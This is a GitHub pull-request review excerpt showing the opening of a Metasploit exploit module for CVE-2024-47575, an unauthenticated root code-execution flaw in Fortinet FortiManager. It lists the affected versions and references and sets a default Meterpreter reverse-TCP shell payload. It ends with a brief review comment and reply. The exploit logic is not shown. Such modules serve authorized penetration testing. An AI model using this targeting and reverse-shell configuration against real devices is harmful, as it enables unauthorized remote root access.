modules/exploits/linux/misc/fortimanager_rce_cve_2024_47575.rb

```diff
@@ -0,0 +1,321 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::Tcp
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Fortinet FortiManager Unauthenticated RCE',
+        'Description' => %q{
+          This module exploits a missing authentication vulnerability affecting FortiManager and FortiManager
+          Cloud devices to achieve unauthenticated RCE with root privileges.
+
+          The vulnerable FortiManager versions are:
+          * 7.6.0
+          * 7.4.0 through 7.4.4
+          * 7.2.0 through 7.2.7
+          * 7.0.0 through 7.0.12
+          * 6.4.0 through 6.4.14
+          * 6.2.0 through 6.2.12
+
+          The vulnerable FortiManager Cloud versions are:
+          * 7.4.1 through 7.4.4
+          * 7.2.1 through 7.2.7
+          * 7.0.1 through 7.0.12
+          * 6.4 (all versions).
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'sfewer-r7', # MSF Exploit & Rapid7 Analysis
+        ],
+        'References' => [
+          ['CVE', '2024-47575'],
+          # AttackerKB Rapid7 Analysis.
+          ['URL', 'https://attackerkb.com/topics/OFBGprmpIE/cve-2024-47575/rapid7-analysis'],
+          # Bishop Fox details certificate requirements for connecting to the FGFM service.
+          ['URL', 'https://bishopfox.com/blog/a-look-at-fortijump-cve-2024-47575'],
+          # Vendor Advisory.
+          ['URL', 'https://fortiguard.fortinet.com/psirt/FG-IR-24-423']
+        ],
+        'DisclosureDate' => '2024-10-23',
+        'Platform' => %w[unix linux],
+        'Arch' => [ARCH_CMD],
+        'Privileged' => true, # Code execution as 'root'
+        'DefaultOptions' => {
+          'RPORT' => 541,
+          'SSL' => true,
+          'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp',
```

Comment:
```suggestion
```

Reply:
commit [f59bfe9](https://github.com/rapid7/metasploit-framework/pull/19648/commits/f59bfe98a3471a85a6dcf5e7e2472b2d103c2856) resolves this.